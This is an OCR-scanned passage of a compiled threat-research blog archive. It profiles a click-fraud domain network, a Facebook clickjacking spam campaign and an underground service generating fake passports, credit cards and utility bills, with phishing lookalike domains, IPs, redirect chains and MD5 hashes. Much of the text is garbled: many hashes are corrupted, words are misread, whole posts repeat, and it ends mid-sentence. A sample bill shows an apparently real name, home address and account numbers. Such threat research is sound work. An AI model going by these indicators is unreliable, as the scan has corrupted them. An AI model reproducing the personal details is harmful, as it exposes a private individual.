ADRIEN BRODY NUDE - NAKED - SHOCKING VIDEO! - Scribd 
www.scribd.convdoc/.. Jadrien-brody-nude-naked-shocking-video = 

Apr 28, 2013 - ADRIEN BRODY NUDE - NAKED - SHOCKING VIDEO! - Free downloac 
or readfalse online for free. 


www.scridd.com/doc/.. /akshaye-khanna-nude-naked-shocking-video ~ 
Apr 28, 2013 - AKSHAYE KHANNA NUDE - NAKED - SHOCKING VIDEO! - Free 
download or readfalse online for free. 


The following related domains are also registered with the same_ email 
canto@hushmail.com): 


4cheapsmoke.com 
777payday.com 
aboutforexincome.com 
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(bel- 


agroindusfinance.com 
atvcrazy.com 
bbbamericashop.com 
bizquipleasing.com 
cashforcrisis.com 
cashmores-caravans.com 
cashswim.com 
cheapbuyworld.com 
cheaptobbacco.com 
cheapuc.com 
debtheadaches.com 
debtonatorct.com 
gcecenter.com 
goldforcashevents.com 
studioshc.com 
thestandardjournal.com 
travelgurur.com 
atlanticlimos.net 
bethelgroup.net 
caravanningnews.net 
casting-escort.net 
cheapersales.net 
couriernetwork.net 
dragonarttattoo.net 
girlgeniusonline.net 
madameshairbeauty.net 
manchester-escort.net 
mygirlythings.net 
vocabhelp.net 
cheapmodelships.com 
financialdebtfree.com 
mskoffice.com 
cashacll.com 
apollohealthinsurance.com 
nieportal.com 
playfoupets.com 
wducation.com 
carwrappingtorino.net 
crewealexultras.net 
diamondsmassage.net 
isleofwightferries.org 
migliojewellery.org 
mind-quad.org 
moneyinfo.us 
2daysdietslim.com 
999cashlline.com 
capitalfinanceome.com 
capitlefinanceone.com 
captialfinanceone.com 
carehireinsurance.com 
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cashadvaceusa.com 
cashadvancesupprt.com 
cashdayday.com 
cashgftingxpress.com 
cashginie.com 
cashsoltionsuk.com 
cathayairlinescheapfare.com 
cheapaddidastops.com 
cheapaparmets.com 
cheapariaoftguns.com 
cheapcheapcompters.com 
cheapdealsinmalta.com 
cheapdealsorlando.com 
cheapeestees.com 
cheapetickete.com 
cheapeygptholidays.com 
cheapfaresairlines.com 
cheap-flighs.com 
cheapflyithys.com 
cheapfreestylebmx.com 
cheapgoldjewelery.com 
cheaphnoels.com 
cheapholidaysites.com 
cheaphotellakegeorge.com 
cheaplawnbowls.com 
cheapmlalairsoft.com 
cheapmetalsticksdiablo.com 
cheapmpwers.com 
cheapmsells.com 
cheapotickeds.com 
cheapottickets.com 
cheapprotien.com 
cheapryobicordlesstools.com 
cheap-smell.com 
cheapsmellscom.com 
cheapsmes.com 
cheapsscents.com 
cheapstockers.com 
cheapsummerdresser.com 
cheaptents4sale.com 
cheaptertextbooks.com 
cheaptikesps.com 
cheaptrainfairs.com 
cheaptstickts.com 
cheaptunictops.com 
cheapuksupplement.com 
cheapversaceclothes.com 
cheapviagra4u.com 
cliutterdiet.com 
cocheaptickets.com 
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dailcheapreads.com 
dcashstudious.com 
debtinyou.com 
diabetesdietsplans.com 
dietaetreino.com 
dietcetresults.com 
dietcheff.com 
dietdessertndgos.com 
dietemaxbrasil.com 
dietopan.com 
discoveryremortgages.com 
dmrbikescheap.com 
ferrrycheap.com 
financeblogspace.com 
firstleasingcompanyofindia.com 
firstresponcefinance.com 
forexdirecotery.com 
forexfacdary.com 
foreximegadroid.com 
forextrading2u.com 
jitzcash.com 
insanelycheapfights.com 
insurancenbanking.com 
inevenhotel.net 
islamic-bank.us 
italyonlinebet.com 
m3motorsite.com 
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®@ SECURITY GUARDS AGENCIES 
~ It Security 
Security Camera www.Sulekha.com 
~ Computer Security 
~ Computer ®@ SECURITY CAMERAS 
~ Email Security 
~ Home Security System www.Alibaba.com/Security-Cameras 
~ Spyware Protection 
= Internet Software = SECURITY SERVICES 
* Scanner 


~ Cisco Route ‘ 
Cisco Router www-relyonfacility.com 


@ SECURITY JOBS 
indeed.co.in/Security 


® SECURITY GUARD REMOVAL 


CleanAllSpyware.com 


® ETHERNET ENCRYPTORS 


www.Senetas-Europe.com 


Out of the hundreds of domains known to have phoned back to the same IP in the past, the 
following are particularly interesting: 


motors.shop.ebay.com-cars-trucks-9722711.1svvo.net 
motors.shop.ebay.com-trucks-cars-922.1svvo.net 

paupal.it 

paypa.com.login.php.nahda-online.com 

paypal-secure.bengalurban.com 
paypal.com-cgi.bin-webscr.cmd.login.submit-dispatch.5885d80a.13cOdb1f8.e263663. d3fa- 
ee. 38deaa3.e263663.login.submit.3.webrocha.com 
paypal.com-cgi.bin-webscr.cmd.login.submit-dispatch.5885d80a.13cOdb1f8.e263663. d3fa- 
ee. 38deaa3.e263663.login.submit.4.webrocha.com 
paypal.com.update.service.cgi.bin.webscr.cmd.login-submit.modernstuf.com 
paypal.com.update.service.cgi.bin.webscr.cmd.login.submit.modernstuf.com 
paypal.com.us.cgi-bin.webscr-cmd.login-run.dispatch.5885d80a13c0db1f8e263663d3f - 
aee8d43b1bb6cabed6aee8d43b16cv27bc. 


4328 


darealsmoothvee.com 
paypal.it.bengalurban.com 


Malicious MD5s known to have made HTTP (monetization) requests to the same IP 
(69.43.161.176): 


MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 


7fa7500cd90bd75ae52a47e5c18ba800 
84b28cf33dee08531ab6ece603ca92451 
f04ce06f5b1c89414cb1ff9219401a0e 
b2019625e4fd41ca9d70b07f2038803e 
6cfb98ac63b37C20529cC43923bcb257c 
04641dbafe3d12b00a6b0cd84fba557f 
02476b31f2cdc2b02b8ef1e0072d4eb2 
0d5a69fa766343f77630aa936bb64722 
577520b63958031336822926ed0d10b5 
00d08b163a86008cbe3349e4794ae3Cc0 
8dd2223dalad1a555361c67794eb7e24 
737309010740c2c1fba3d989233c199Cc 
e€b3043e13dd8bb34a4a8b75612fe401le 
e€b4737492d9abcc4bd43b12305c4b2fc 
6257b9c3239db33a6c52a8ecb2135964 
481366b6e867af0d47a6642e07d61f10 
d58b7158b3b1fb072098dba98dd82ed5 
9dd425b00b851f6c63ae069abbbec037 
6b0c07ce5ff1c3a47685f7be9793dce5 
b2b5e82177a3beb917f9dd1la9a2cf91c 
05070da990475ac3e039783df4e503bc 
c332dd499cdba9087d0c4632a76c59f0 
0768764fbbeb84daa5641f099159ee7f 
843b44c77e47680aa4b274eeelaad4e7 
36f92066703690df1c11570633c93e73 
0504b00c51b0d96afd3bea84a9a242a2 
8b0de5eabc27d37fa97d2b998ffd841la 
2944b1437d1e8825585eea3737216776 
fa13c7049ael4be0cf2f651fb2fa74ba 
ba5e47e0ed7b96a34b716caee0990ea3 
€67e56643f73ed3f6027253d9b5bdfac 
8bO0de5eabc27d37fa97d2b998ffd841la 
2944b1437d1e8825585eea3737216776 
0ab654850416e347468a02ca5a369382 
4e372e5d1e2bd3fa68b85f6d1f861087 
696a9b85230a315cfe393d9335cae770 
04343c3269c33a5613ac5860ddb2ab81 
384a496cd4c2bc1327c225e19edbee54 
a44b2380cdac36f9dfb460f8fbff3714 
9e2a83adb079048d1c421afaf56a73ab6 
e377c7ad8ab55226e491d40bf914e749 
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MD5: 46c7c70e30495b4b60be1c58a4397320 
MD5: 841890281b7216e8c8eal 953b255881e 
MD5: 4392f490e6ee553ff7a7b3c4bd1dd13f 
MD5: eeeda63bec6d2704cf6f77f2fb8431cd 
MD5: b68e183884ce980e300c93dfa375bb1f 
MD5: 7990fb5c676bbcd0a6168ea0f8a0cl1ld7 
MD5: adc250439474d38212773e161dadd6b4 
MD5: 075ae09c016df3c7eb3d402d96fc2528 
MD5: d03b5bf4a905879d9b93b6e81fc1ca55 
MD5: 00c62c8a9f2cf7140b67acec477e6al4 
MD5: b228fae216a9564192fa2153ae911d54 
MDS5: 2f778fc3a22b7d5feb0a357c850bdd0d 
MD5: 9080f3a0dfde30aa8afab64f7c3f5d79a 
MD5: 526c1f10f94544344del2abec96cf96f 
MD5: 4d8ddc8d5f6698a6690985ca86b3de00 
MD5: 1a7bb0c9b79d1604b4de5b0015202d02 
MD5: 528be69afad5a5e6beb7b40aeb656160 
MD5: 1769flb5beae58c09e5elaac9249f5de 
MDS5: 6fb86421ea607ed6cC912a3796739ce9b 
MD5: 22e€36b887946e457964a2a28a756alcd 
MD5: 31a7816a1458321736979e0cfdd3d20f 
MD5: 113572249856fc5f2848d1add06dc758 
MD5: a8a002732c5a4959afbf034d37992b5d 
MD5: 413a9116362ab8fb9ba622cc98Cc788b1 
MD5: 4abb29fe3ec3239d93f7adbc8cb70259 
MD5: 989bea3435e5ac5b8951baa07d356526 
MD5: 9a966076f114fbffc5cdbf5a90b3fd0l 
MD5: 14e64da2094ablaae13d162107c504ec 
MD5: 96bb6df37daef5b8de39ceaele3a7396 
MD5: d864369a0e8687ad3f89b693be84c8eb 
MD5: 26b8b2c06e1604daee6bfe783a82479e 
MD5: 63b922c94338862e7b9605546af2ef14 
MD5: 19ba1497f088d850bd3902288bb3bd92 
MD5: 96bb6df37daef5b8de39ceaele3a7396 
MD5: d864369a0e8687ad3f89b693be84c8eb 
MD5: 26b8b2c06e1604daee6bfe783a82479e 


Malicious MD5s known to have made HTTP (monetization) requests to the same IP 
(208.73.211.152): 


MD5: db0aac72ed6d56497e494418132d7a41 
MD5: aa47bd20f8a00e354633d930a3ebcb19 
MD5: a957e914f697639df7dfb8483a88483b 
MD5: a0b7b01a0574106317527e436e515fd3 
MD5: 3d0d834fe7ca583ca6ed056392f4413d 
MD5: fa342104b329978cba33639311lafe446 
MD5: f3b3e8b98bdfb6673da6d39847aecl1b3 
MD5: 3ef52b2fd086094b591eb01bc32947c8 
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MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 


128e70484a9f1 9ab9096fb9b1969bf89 
ee7dc2d2c7d33855b4dd86ae6243ad22 
6fc317b6f66d73903ffe8d12df72e5f7 
3800a4a6d6620aa15db7ea717b4d10f5 
830bbfcaa499de30ab08a510ce4cbba2 
085afd7f26f388bd62bc53ed430fbbc6 
3035e120ce08f1 82481 7e0d6eaecc806 
d4db511618c52272e58f4c334414ed6e 
dc4ab086d50dcdcd5ae060acfe9bddca 
c2bc9€266857537699fd10142658bf31 
9e6ab643d34a6c37b6150aeb8a2e5adb 
b6bb96470ef67c26c0a0e8a4d145c169 
f5aa326e005322d7ac47a379el1le1cl1fés 
dc0f5c0O1d8deaabe9d57d31f9daf50b9 
4a42c42e7acd9ff32ebb18efc2d5b801 
a254b2824867e05d52c60e0464121588 
7e612f7ac81ccddb368d3c9e47c9942a 
66cec28f23b692ff2019C70a76894c41 


This case is a great example of one of the core practices when profiling cybercrime inci- 
dents and campaigns -> sample everything, as what you’re originally seeing is just the tip of 
the iceberg. 


Related posts: 


[1]Click Fraud, Botnets and Parked Domains - All Inclusive 


[2]A Commercial Click Fraud Tool 


1. http: //ddanchev. blogspot .com/2008/07/click-fraud-botnets-and-parked-domains .htm 
2. http://ddanchev.blogspot .com/2007/08/commercial-click-fraud-tool.htm 
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9.6.6 Fake ’Rihanna & Chris Brown S3X Video’ Spam Campaign Spreading Across 
Facebook, Monetized Through Adf Dot Ly PPC Links (2013-06-22 10:56) 


— 
23 hours ago @ 


—_ Rihanna & Chris Brown Exposed Today Duing S3X — with _ k= 


nd 39 others. 


Like * Comment * Share 


[ —*~ video here ===> http: //adf.ly/Ord2fcid=5 1¢3e798aff9a 
http:/ /adf.ly/Qrd2f 


adf.ly 


23 hours ago * Like 


A currently ongoing, click-jacking driven soam campaign is circulating across Facebook, with 
the affected users further spreading the adf.ly links on the Walls of their friends, in between 
tagging them, with the cybercriminal/cybercriminals behind the campaign, earning revenue 
through the adf.ly pay-per-click (PPC) monetization scheme. 


Redirection chain: 

hxxp://adf.ly/Qrd2f?cid=51c3e798aff9a -> hxxp://rihannaofficialvideo.blogspot.de/?231514 
->  hxxp://www.smilegags.com/watch/jack.php?action=connect &cid=51c3e798aff9a -> 
hxxp://lolzbestpic.com 
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[Video] You Will Hate Rihanna After Watching 
This 


MD5s for the Facebook spamming/click-jacking scripts: 
MD5: fe97840bd2af654acdb63fd80b094531 
MD5: f8a360728a896d40bbb0f190375fb6f6 
MD5: bae32ffd43ac2f518dafeedb8901e2de 
MD5: 90fa366b8affac24fe182b7b5de51b16 


Domain name reconnaissance: 
smilegags.com - 184.107.164.158 
lolzbestpic.com - 64.79.76.226 


Name servers used: 

Name Server: NS1.PYARISHQ.INFO 

Name Server: NS2.PYARISHQ.INFO 

Name Server: NS1.HOSTING.XLHOST.COM 
Name Server: NS2.HOSTING.XLHOST.COM 


Responding to the same IP (184.107.164.158) are also the following domains: 


amasave.com 
wikilieaksvideo.com 
ns1.pyarishq.info 
ns2.pyarishq.info 


Known to have responded to the same IP (184.107.164.158) in the past are also the 


following domains: 
costcochristmas.com 
costcogives.com 
giftcardgratis.com 
icagivings.com 
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lomanako.com 
picknpaygives.com 
remabilaget.com 
rewegives.com 
vodkaforyou.info 
topvideosweden.com 


Responding to (64.79.76.226) is also the following domain: 
silali.info 


Known to have responded to the same IP (64.79.76.226) is also the following domain: 
promvideo.pw 


Related posts: 

[1]Koobface Botnet Redirects Facebook’s IP Space to my Blog 

[2]Malware-Serving "Who’s Viewed Your Facebook Profile" Campaign Spreading Across Face- 
book 

[3]Fake ‘Facebook Profile Spy Application’ Campaign Spreading Across Facebook 

[4]Phishing Campaign Spreading Across Facebook 

[5]Facebook Malware Campaigns Rotating Tactics 

[6]MySpace Phishers Now Targeting Facebook 

[7]Facebook Photo Aloum Themed Malware Campaign, Mass SQL Injection Attacks Courtesy of 
AS42560 

[8]Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits 


This post has been reproduced from [9]Dancho Danchev’s blog. Follow him 
[10]Jon Twitter. 
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. http: //ddanchev. blogspot. com/2013/06/malware-serving-whos-viewed-your -html 

- http: //ddanchev. blogspot . com/2013/05/fake- facebook-profile-spy-application. html 
. http: //ddanchev. blogspot .com/2008/06/phishing- campaign-spreading-across.htm 

. http: //ddanchev. blogspot . com/2008/08/facebook-malware-campaigns~rotating. htm] 

. http: //ddanchev. blogspot . com/2008/01/myspace-phishers-now-targeting-facebook . html 


photo-album-themed-malware.htm 


. http: //ddanchev. blogspot .com/2010/01/facebookaol-update-tool-spam-campaign.htm 


. http: //ddanchev. blogspot .com/ 


10. http: //twitter.com/danchodanche 


ODANOAURWNE 


Ga 
Ge 
‘3 
~ 
~ 
Qa 
[on 
o@ 
B 
aQ 
Dp 
@O 
q 
ion 
# 
° 
0a 
n 
ue) 
° 
ct 
a 
fe} 
B 
~ 
N 
(o) 
Be 
Oo 
~ 
jo) 
>) 
~ 
Fh 
re) 
a 
0) 
ion 
° 
° 
a 


9.6.7 Fake ’Rihanna & Chris Brown S3X Video’ Spam Campaign Spreading Across 
Facebook, Monetized Through Adf Dot Ly PPC Links (2013-06-22 10:56) 
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—I ‘ 
23 hours ago @ 


— Rihanna & Chris Brown Exposed Today Duing $3X — with kj 


and 39 others. 


Like * Comment * Share 


i—* video here ===> http: //adf.ly/Qrd2fcid=5 1c3e798aff9a 
http:/ /adf.ly/Qrd2f 


adf.ly 


23 hours ago * Like 


A currently ongoing, click-jacking driven spam campaign is circulating across Facebook, 
with the affected users further spreading the adf.ly links on the Walls of their friends, in 
between tagging them, with the cybercriminal/cybercriminals behind the campaign, earning 
revenue through the adf.ly pay-per-click (PPC) monetization scheme. 
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Redirection chain: 


hxxp://adf.ly/Qrd2f?cid=51c3e798aff9a -> hxxp://rihannaofficialvideo.blogspot.de/?231514 
->  hxxp://www.smilegags.com/watch/jack.php?action=connect &cid=51c3e798aff9a -> 
hxxp://lolzbestpic.com 


[Video] You Will Hate Rihanna After Watching 


This 


MD5s for the Facebook spamming/click-jacking scripts: 
MD5: fe97840bd2af654acdb63fd80b094531 
MD5: f8a360728a896d40bbb0f190375fb6f6 


MD5: bae32ffd43ac2f518dafeedb8901e2de 
MD5: 90fa366b8affac24fel182b7b5de51b16 


Domain name reconnaissance: 


smilegags.com - 184.107.164.158 


lolzbestpic.com - 64.79.76.226 
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Name servers used: 

Name Server: NS1.PYARISHQ.INFO 

Name Server: NS2.PYARISHQ.INFO 

Name Server: NS1.HOSTING.XLHOST.COM 


Name Server: NS2.HOSTING.XLHOST.COM 


Responding to the same IP (184.107.164.158) are also the following domains: 
amasave.com 

wikilieaksvideo.com 

ns1.pyarishq.info 


ns2.pyarishq.info 


Known to have responded to the same IP (184.107.164.158) in the past are also the 
following domains: 


costcochristmas.com 
costcogives.com 
giftcardgratis.com 
icagivings.com 
lomanako.com 
picknpaygives.com 
remabilaget.com 
rewegives.com 
vodkaforyou.info 


topvideosweden.com 


Responding to (64.79.76.226) is also the following domain: 
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silali.info 


Known to have responded to the same IP (64.79.76.226) is also the following domain: 


promvideo.pw 


Related posts: 
[1]Koobface Botnet Redirects Facebook’s IP Space to my Blog 


[2]Malware-Serving "Who’s Viewed Your Facebook Profile" Campaign Spreading Across 
Facebook 


[3]Fake ‘Facebook Profile Spy Application’ Campaign Spreading Across Facebook 
[4]Phishing Campaign Spreading Across Facebook 

[5]Facebook Malware Campaigns Rotating Tactics 

[6]MySpace Phishers Now Targeting Facebook 


[7]Facebook Photo Album Themed Malware Campaign, Mass SQL Injection Attacks Cour- 
tesy of AS42560 


[8]Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits 


. http: //ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 


. http: //ddanchev. blogspot .com/2013/06/malware-serving-whos-viewed-your.htm 
. http: //ddanchev. blogspot .com/2013/05/fake-facebook-profile-spy-application.htm 


i campaign-spreading-across.htm 


1 
2 
3 
4 
5. http: //ddanchev. blogspot . com/2008/08/facebook-malware-campaigns-rotating. html 
6 
7 
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. http: //ddanchev. blogspot .com/2008/01/myspace-phishers-now-targeting-facebook. html 
. http: //ddanchev. blogspot .com/2010/06/facebook- photo-album-themed-malware. htm 
. http: //ddanchev. blogspot .com/2010/01/facebookaol-update-tool-spam-campaign.htm 
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9.7 July 


9.7.1 Summarizing Webroot’s Threat Blog Posts for June (2013-07-04 18:38) 


threat blog 


Products Suppor Communty & Resouces Patners About Webroot About the Bloggers 


Newly launched underground market service harvests Searcn 
mobile phone numbers on demand 


_STOP THE GUESSWORK 
By Dancho Danchev 


SecureAnyatvere 
User Protection 


= ONE lense protects 
“FOUR cevices 


in May of 2012, we heghhghted the increasing public availabilty of managed SMS spam services that can send hundreds 
of thousands of SMS messages across multiple verticals. These services are assisted through the use of propnetary or 
publicly obtainable phone number harvesting and verifying DIY applications 


In this post, Fil profile ome of the most recently adverised managed mobile phone number harvesting service whech allows 


full customization of the harvesting criiena based on the specific requirements of the customer LEARN MORE» 


More details 
Crntiomareding WEB THREAT REPORT: 
Ted pour treads: Bj Facets () twee GB Googe +t [) Unteae ch Recast Ei Emat |=) More 
1S YOUR COMPANY EXPOSED? 
Live Oe 


Get a compienertary copy of a new 
Survey, and learn about the latest 
Wed Doene thveats, including ther 


Costs and enpacts 


DOWNLOAD THE STUDY NOW » 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for June, 2013. 
You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


x 


01. [3]Compromised FTP/SSH account privilege-escalating mass iFrame embedding platform 
released on the underground marketplace 


02. [4]New E-shop sells access to thousands of hacked PCs, accepts Bitcoin 

03. [5]Pharmaceutical scammers impersonate Facebook’s Notification System, entice users 
into purchasing counterfeit drugs 

04. [6]iLivid ads lead to ‘Searchqu Toolbar/Search Suite’ PUA (Potentially Unwanted Applica- 
tion) 


05. [7]Hacked Origin, Uplay, Hulu Plus, Netflix, Spotify, Skype, Twitter, Instagram, Tumblr, 
Freelancer accounts offered for sale 

06. [8]Scammers impersonate the UN Refugee Agency (UNHCR), seek your credit card details 
07. [9]Fake ‘Unsuccessful Fax Transmission’ themed emails lead to malware 

08. [10]Tens of thousands of spamvertised emails lead to W32/Casonline 

09. [11]Rogue ads lead to SafeMonitorApp Potentially Unwanted Application (PUA) 

10. [12]How cybercriminals apply Quality Assurance (QA) to their malware campaigns before 
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launching them 

11. [13]Rogue ads target EU users, expose them to Win32/Toolbar.SearchSuite through the 
KingTranslate PUA 

12. [14]New boutique iFrame crypting service spotted in the wild 

13. [15]Rogue ‘Oops Video Player’ attempts to visually social engineer users, mimicks Adobe 
Flash Player’s installation process 

14, [16]New E-Shop sells access to thousands of malware-infected hosts, accepts Bitcoin 

15. [17]New subscription-based SHA256/Scrypt supporting stealth DIY Bitcoin mining tool 
spotted in the wild 

16. [18]Rogue ‘Free Mozilla Firefox Download’ ads lead to ‘InstallCore’ Potentially Unwanted 
Application (PUA) 

17. [19]SIP-based APl-supporting fake caller ID/SMS number supporting DIY Russian service 
spotted in the wild 

18. [20]Rogue ‘Free Codec Pack’ ads lead to Win32/InstallCore Potentially Unwanted Applica- 
tion (PUA) 

19, [21]Self-propagating ZeuS-based source code/binaries offered for sale 

20. [22]How cybercriminals create and operate Android-based botnets 


This post has been reproduced from [23]Dancho Danchev’s blog. Follow him 
[24]on Twitter. 


1. http: //blog.webroot.com/ 
2. http: //feeds2.feedburner .com/WebrootThreatBlog 
3 


http: //blog.webroot.com/2013/06/03/compromised-ftpssh-account-privilege-escalating-mass-iframe-embedding- 


platform-released-on-the-underground-marketplace/ 


4. http: //blog.webroot.com/2013/06/04/new-e-shop-sells-access-to-thousands- of -hacked-pcs-accepts-bitcoin/ 


ttp://blog .webroot .com/2013/06/05/pharmaceutical-scammers-impersonate-facebooks-notification-system-enti 


ce-users- into-purchasing- counterfeit-drugs/ 


6. http://blog.webroot .com/2013/06/06/ilivid-ads-lead-to-searchqu-toolbarsearch-suite-pua-potentially-unwant 


ed-application/ 


7. bhttp://blog.webroot .com/2013/06/07/hacked-origin-uplay-hulu-plus-netflix-spotify-skype-twitter-instagram- 


umblr-freelancer-accounts-offered-for-sale/ 


8. http: //blog.webroot.com/2013/06/10/scammers- impersonate-the-un-refugee-agency-unhcr-seek- your- credit-card 


9. http: //blog. webroot .com/2013/06/11/fake-unsuccessful-fax-transmission-themed-emails-lead-to-malware/ 
10. http: //blog. webroot. com/2013/06/12/tens- of-thousands-of-spamvertised-emails-lead-to-w32casonline/ 


11. http://blog. webroot .com/2013/06/13/rogue-ads-lead-to-safemonitorapp-potentially-unwanted-application-p 


12. http://blog.webroot .com/2013/06/14/how-cybercriminals-apply-quality-assurance-qa-to-their-malware-campa 


igns-before-launching-them/ 


13. http://blog.webroot .com/2013/06/17/rogue-ads-target-eu-users-expose-them-to-win32toolbar-searchsuite-t 


rough-the-kingtranslate-pua/ 


14. http: //blog. webroot . com/2013/06/18/new-boutique-iframe-crypting-service-spotted-in-the-wild/ 


15. bttp://blog.webroot .com/2013/06/19/rogue-oops-video-player-attempts-to-visually-social-engineer-users-m 


imicks-adobe-flash-players-installation-process/ 


16. http://blog.webroot .com/2013/06/20/new-e-shop-sells-access-to-thousands-of-malware-infected-hosts-accep 


17. hbttp://blog. webroot .com/2013/06/21/new- subscription-based-sha256scrypt-supporting-stealth-diy—bitcoin- 


ining-tool-spotted-in-the-wild/ 


18. http://blog.webroot .com/2013/06/24/rogue-free-mozilla-firefox-download-ads-lead-to-installcore-potentia 


1lly-unwanted-application-pua/ 


19. http://blog.webroot.com/2013/06/25/sip-based-api- support ing-fake-caller-idsms-number-supporting-diy-rus 


sian-service-spotted-in-the-wild/ 


20. http://blog. webroot .com/2013/06/26/rogue-free-codec-pack-ads-lead-to-win32installcore-potentially-unwa 


ed-application-pua/ 


21. http://blog.webroot .com/2013/06/27/self-propagat ing-zeus-based-source-codebinaries-offered-for-sale/ 


22. http://blog. webroot .com/2013/06/28/how-cybercriminals-create-and-operate-android-based-botnets/ 


23. http://ddanchev.blogspot.com/ 
24. http://twitter.com/danchodanche 


9.7.2 Newly Launched ’Scanned Fake Passports/IDs/Credit Cards/Utility Bills’ Ser- 
vice Randomizes and Generates Unique Fakes On The Fly (2013-07-04 19:42) 


In my most recent analysis of the [1]Russian underground marketplace for fake docu- 
ments/IDs/passports, | emphasized on overall prevalence of fake identities, which can be 
both, manually ‘crafted’ by experienced designers possessing high quality scanned originals 
in order to produce physical copies, or automatically generated, with the users sacrificing 
quality in the process or looking for a bargain deal. 


What’s also worth emphasizing on in terms of discussing this cybercrime ecosystem market 
segment from multiple perspectives, is the overall international acceptance of scanned 
identification documents for various remote identification purposes, which opens doors to 
the systematic abuse of a vast number of legitimate services, as well as helps facilitate the 
generation of fake personalities, which can be abused in a any way the fraudster desires. 


What are some of the latest developments within this cybercrime ecosystem market 
segment? The introduction of a scalable, [2]DIY (do it yourself) self-service on the basis of a 
pseudo-randomized database of fake identity data, photo IDs with randomized appearance 
characteristics on the fake scanned documents, to avoid detection of a single pattern, all 
available as a service, as of June, 2013. 


Basically, what this service does, is to provide a DIY Web based interface where users 
can take advantage of the on-the-fly generation of fake scanned copies of identification 
documents such as passports/IDs or credit cards. According to the vendor, the service has 
an inventory of over 200 photos for passports and IDs, is completely randomizing multiple 
aspects of the generated scanned fakes, in an attempt to mitigate the probability of having 
an entire set of statically generated fakes, easily detected by, for instance, law enforcement. 


The vendor also claims that the service can generate a fake in approximately 40 sec- 
onds. Payment methods accepted? WebMoney, PerfectMoney, Bitcoin and Paymer. 


Sample screenshots of sample scanned fakes generated using the service, and offered 
as samples: 
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ONMCAHME NONEA: 

1, HOMEP MACCNOPTA 

2. DAMMNKA 

3. WMA 

4. DATA POKAEHMA 

5. MECTO POKAEHMA 

6. BATA BbIZAYH MACCNOPTA 

7. BATA OKOHYAHHA CPOKA 
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Sample screenshots of the fake scanned utility bills/credit cards generated using the service: 
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Variant_1 


AMERICAN EXPRESS 


Variant_2 
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Variant_2 


Variant_1 
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List of banks that you 
can order 


Amegybank 
Barclays 

Bnp 

Boa 
Capital_One 
Chase 

Cibs 

Citibank 
Citizens 
Commonwealth 
Harborstone 
Hfds 

Icba 

Nab 

Natwest 
Navy_Federal 
Nordstrombank 
Rbs 

Silverton 
Societegenerale 
Sparkasse 
Union_plus 
Union_bank 
Usbank 
Wachovia 
Wells_Fargo 
Westpac 


Variant 1 Variant 2 Variant 3 


Capital()); 
Bank 


Variant 6 


us bank 


Variant 7 
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Variant 1 Variant 2 Variant 3 
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69 DRIVE 
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LN ye reading ened comment Thank you for paying by Direct Debit You have received OuF maximum discount by 
acount serrbee 
pays this way 
uring 0 se This is your electrecity statement for 15 March 2013 until 18 Juce 2013 
fies can leeve ® ‘estate ice teers! 
As you are spreading your electncrty costs throughowt the year. we wil carry forward 
the balance you owe of £86.22 
— ~ 
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ANOREA WHITE 

69 CROYLAND DRIVE Customer Reference Number: 8500 1435 3355 
BEDFORD Bill date 10 May 2013 

MK42 9GH 


Mesowetcat 


Billing summary 


Billing period 14 Feb - 9 May 2013 
Good news - our gas rates have gone down again 
We have reduced our gas rates for the second time this 


Your tast bill £232.01 = 
year nat = 
OurCommitmenttoYou ==  — —— |* Paya Tecehed Dak you =e 723201 = 
To recetve our Social Obligations leaflet, detaiing a record . = a = 
of the performance of British Gas regarding our social = 
obligations to customers, please call 0845 955 5200. Lines 202.01 Postel Peyment = 
are open 8am to 8pm Monday to Friday, Barn to Gpen Gas you've used £129.43 = 
Saturday (actual reading) Please turn over for detat > — 

= 


Gas meter pont reference 9154428507 


“_ 


Financial institutions part of the service’s inventory of fake scanned credit cards: 
- Amegybank 

- Barclays 

- Bpn 

- Boa 

- Capital One 

- Chase 

- Cibs 

- Citibank 

- Citizens 

- Commonwealth 
- Harborstone 

- Hfds 

- Icba 
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- Nab 

- Natwest 

- Navy Federal 

- Nordstrombank 
- Rbs 

- Silverton 

- Societegenerale 
- Sparkasse 

- Union Plus 

- US Bank 

- Wachovia 

- Wells Fargo 

- Westpac 


With scanned IDs continuing to act as the primary (remote) identification factor for a 
huge number of legitimate companies, it shouldn’t be surprising that cybercriminals have 
apparently found a way to automate the process, allowing it to scale, and eventually grow, 
with the efficiency-centered model becoming the de factor standard for [3]Quality Assurance 
(QA) within the cybercrime ecosystem. 


This post has been reproduced from [4]Dancho Danchev’s blog. Follow him 
[5]Jon Twitter. 


1, ftip://ddanchev. blogspot .con/2018/08/a~peok-ineide-russian- underground heal 
2, heep://olog. webroot con/tag/ aay) 

3, ttp://blog. webroot. con/tag/ quality assurance) 

4, hetp://adanchev blogspot. con/ 

5, http://twitter.con/danchodanchev 


9.7.3 Newly Launched ’Scanned Fake Passports/IDs/Credit Cards/Utility Bills’ Ser- 
vice Randomizes and Generates Unique Fakes On The Fly (2013-07-04 19:42) 


In my most recent analysis of the [1]Russian underground marketplace for fake docu- 
ments/IDs/passports, | emphasized on overall prevalence of fake identities, which can be 
both, manually ‘crafted’ by experienced designers possessing high quality scanned originals 
in order to produce physical copies, or automatically generated, with the users sacrificing 
quality in the process or looking for a bargain deal. 


What’s also worth emphasizing on in terms of discussing this cybercrime ecosystem market 
segment from multiple perspectives, is the overall international acceptance of scanned 
identification documents for various remote identification purposes, which opens doors to 
the systematic abuse of a vast number of legitimate services, as well as helps facilitate the 
generation of fake personalities, which can be abused in a any way the fraudster desires. 


What are some of the latest developments within this cybercrime ecosystem market 
segment? The introduction of a scalable, [2]DIY (do it yourself) self-service on the basis of a 
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pseudo-randomized database of fake identity data, photo IDs with randomized appearance 
